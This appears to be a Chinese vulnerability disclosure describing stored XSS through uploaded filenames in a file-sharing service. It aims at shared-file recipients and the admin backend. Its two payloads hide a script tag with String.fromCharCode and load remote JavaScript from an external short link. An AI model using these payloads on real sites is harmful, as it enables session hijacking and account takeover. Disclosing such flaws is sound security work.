### 简要描述:
指哪打哪,可打后台
### 详细说明:
linux下可以使用<>作为文件名 上传一个名字为
```
<img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)">
```
的文件共享给好友就可以指谁X谁
假如要X后台上传文件名为
```
"</a><img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)">
```
偷懒代码就不审计了
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg)
[<img src="https://images.seebug.org/upload/201405/01204819dc4b5ff9fffe3d0f6b22a4095755e9a5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/01204819dc4b5ff9fffe3d0f6b22a4095755e9a5.jpg)
暂无评论